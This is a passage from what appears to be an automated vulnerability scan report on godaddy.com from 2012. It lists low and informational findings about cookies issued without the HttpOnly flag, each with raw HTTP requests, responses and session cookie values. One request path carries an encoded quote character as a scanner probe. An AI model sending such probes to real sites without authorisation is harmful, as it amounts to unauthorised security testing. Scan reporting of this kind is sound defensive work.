Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=DCKAMEKBMDJNHMOBJJGMMGNM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:55 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.godaddy.com/gdshop/shopper_lookup.asp?check%5Fsession=&amp;myid=&amp;se=%2B&amp;target
...[SNIP]...

4.11. https://www.godaddy.com/gdshop/real_godaddy.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/real_godaddy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/real_godaddy.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:20:00 GMT
Location: /security/internet-security.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQGQBBDAA=FILAMEKBICCBGKCPCABGJGEG; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:59:59 GMT
Connection: close


4.12. https://www.godaddy.com/gdshop/registrar/search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Mon, 27 Feb 2012 03:02:53 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=KBKAMEKBDHNGEPHKMPDBKEMD; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:53 GMT
Connection: close


4.13. https://www.godaddy.com/gdshop/shopper_lookup.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/shopper_lookup.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/shopper_lookup.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 193
Content-Type: text/html
Expires: Sun, 04 Mar 2012 01:42:58 GMT
Location: https://idp.godaddy.com/login.aspx?login=&spkey=GDSWB137&target=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=PDKAMEKBEOANBBADAFCIDEEG; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:58 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://idp.godaddy.com/login.aspx?login=&amp;spkey=GDSWB137&amp;target=">here</a>.</body>

4.14. http://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=qwaogadtvv45rck5ni3xg0ow; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=qwaogadtvv45rck5ni3xg0ow; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=20; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:31:51 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:31:51 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:31:51 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:31:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=20; domain=godaddy.com; path=/
Set-Cookie: HPBackground=Danica1; path=/
Set-Cookie: HPBackground=Danica1; path=/
Set-Cookie: GoogleADServicesgoogleadwordshome=tfdaqdvjzcrejjidhffemfqgcdtcojqc; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:31:51 GMT; path=/
Date: Mon, 05 Mar 2012 01:31:51 GMT
Content-Length: 194933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.15. http://www.godaddy.com/Business/business-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Business/business-hosting.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Business/business-hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4fj5243rjfbercuviruegzp0; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=4fj5243rjfbercuviruegzp0; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: SplitValue1=64; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:15 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Business/business-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=64; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:16 GMT
Connection: close
Content-Length: 186689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.16. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Controls/JsonContent/DotTypePricing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Controls/JsonContent/DotTypePricing.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cun2mak4l5r3mfjm1hw3w1o4; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=cun2mak4l5r3mfjm1hw3w1o4; path=/; HttpOnly
Set-Cookie: SplitValue1=42; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:43 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=42; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:42 GMT
Connection: close
Content-Length: 29826

{"Html":"\r\n \u003cstyle type=\"text/css\"\u003e\r\n #pricing_table tr#table_header td#header_bg{background-image: url(http://img1.wsimg.com/fos/bkg/42293_chart_topbar.gif);background-color: tran
...[SNIP]...

4.17. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Controls/JsonContent/DotTypePricing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Controls/JsonContent/DotTypePricing.aspx?tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1330911735286&_=1330911735905 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/domains/search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; pagecount=5; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1330911735286&_=1330911735905%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:46:28 GMT; path=/
Date: Mon, 05 Mar 2012 01:46:28 GMT
Content-Length: 29846

tabFill({"Html":"\r\n \u003cstyle type=\"text/css\"\u003e\r\n #pricing_table tr#table_header td#header_bg{background-image: url(http://img1.wsimg.com/fos/bkg/42293_chart_topbar.gif);background-col
...[SNIP]...

4.18. http://www.godaddy.com/Domains/Controls/JsonContent/StackPopIn.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Controls/JsonContent/StackPopIn.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Controls/JsonContent/StackPopIn.aspx?TargetDivID=ctl00_MainContent_stackPopInControl_stackPopInTargetDiv&excludeTlds=&useNewUX=true&_=1330911082260 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; adc1=US; currency1=potableSourceStr=USD; MemPDC1=tfahfhpjialfjigamexjtitgsgvdkfwb; MemPDCLoc1=net; pagecount=3; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/controls/jsoncontent/pendingproductssummary.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=refresh=true&TargetDivId=pending_products_container&ShowCartIcon=true&SummaryTitle=Order+Summary&scb=1&sbm=1&_=1330911080789%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MemPDC1=zbebrdgdmhqegihgphwhdgejzcgadapg; domain=godaddy.com; path=/
Set-Cookie: MemPDCLoc1=net; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:28 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/StackPopIn.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=TargetDivID=ctl00_MainContent_stackPopInControl_stackPopInTargetDiv&excludeTlds=&useNewUX=true&_=1330911082260%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:28 GMT
Content-Length: 122

{"Html":"","TargetDivID":"ctl00_MainContent_stackPopInControl_stackPopInTargetDiv","Properties":{"noStackAvailable":true}}

4.19. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Controls/JsonContent/generalPricing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Controls/JsonContent/generalPricing.aspx?TargetDivID=general_pricing_json_content_new&regt=new&_=1330911739405 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: application/json, text/javascript, */*
Referer: http://www.godaddy.com/domains/search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium=fjwdnezbeenauiycqahixbrhidddugih; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=7; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; BlueLithium_domainsearch=cddeifefcecepgoaqgngnfviadxduebd

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:46:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=TargetDivID=general_pricing_json_content_new&regt=new&_=1330911739405%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:46:55 GMT
Content-Length: 26119

{"Html":"\r\n \u003cstyle type=\"text/css\"\u003e\r\n .general_year_header {font-weight:bold;background-color: #DDDDDD; color:#000;text-align:center;font-size: 13px;padding:5px;}\r\n .genera
...[SNIP]...

4.20. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx/u0027  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Controls/JsonContent/generalPricing.aspx/u0027

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Controls/JsonContent/generalPricing.aspx/u0027 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ml5jc1tqmggeal1bpk13ticw; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ml5jc1tqmggeal1bpk13ticw; path=/; HttpOnly
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=85; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:44 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx/u0027&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=85; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:44 GMT
Connection: close
Content-Length: 26087

{"Html":"\r\n \u003cstyle type=\"text/css\"\u003e\r\n .general_year_header {font-weight:bold;background-color: #DDDDDD; color:#000;text-align:center;font-size: 13px;padding:5px;}\r\n .genera
...[SNIP]...

4.21. http://www.godaddy.com/Domains/Popups/IcannFee.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Popups/IcannFee.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Popups/IcannFee.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=enehrhvvouxezclqgbye0cnl; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=enehrhvvouxezclqgbye0cnl; path=/; HttpOnly
Set-Cookie: SplitValue1=24; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:27 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Domains/Popups/IcannFee.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:27 GMT
Connection: close
Content-Length: 2077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.22. http://www.godaddy.com/Domains/customize.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/customize.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Domains/customize.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.godaddy.com/domains/nodomain.aspx?ci=17302
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1jovonzyz0yfzeqd2cgdk4mm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1jovonzyz0yfzeqd2cgdk4mm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:51 GMT
Connection: close
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.godaddy.com/domains/nodomain.aspx?ci=17302">here</a>.</h2>
</body></html>

4.23. http://www.godaddy.com/NewsCenter/about-godaddy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/about-godaddy.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewsCenter/about-godaddy.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=tfpyojrpp2aswlk1w3btjzro; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=tfpyojrpp2aswlk1w3btjzro; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:14 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:14 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:14 GMT; path=/
Set-Cookie: SplitValue1=2; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:14 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/about-godaddy.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=2; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:14 GMT
Connection: close
Content-Length: 94867


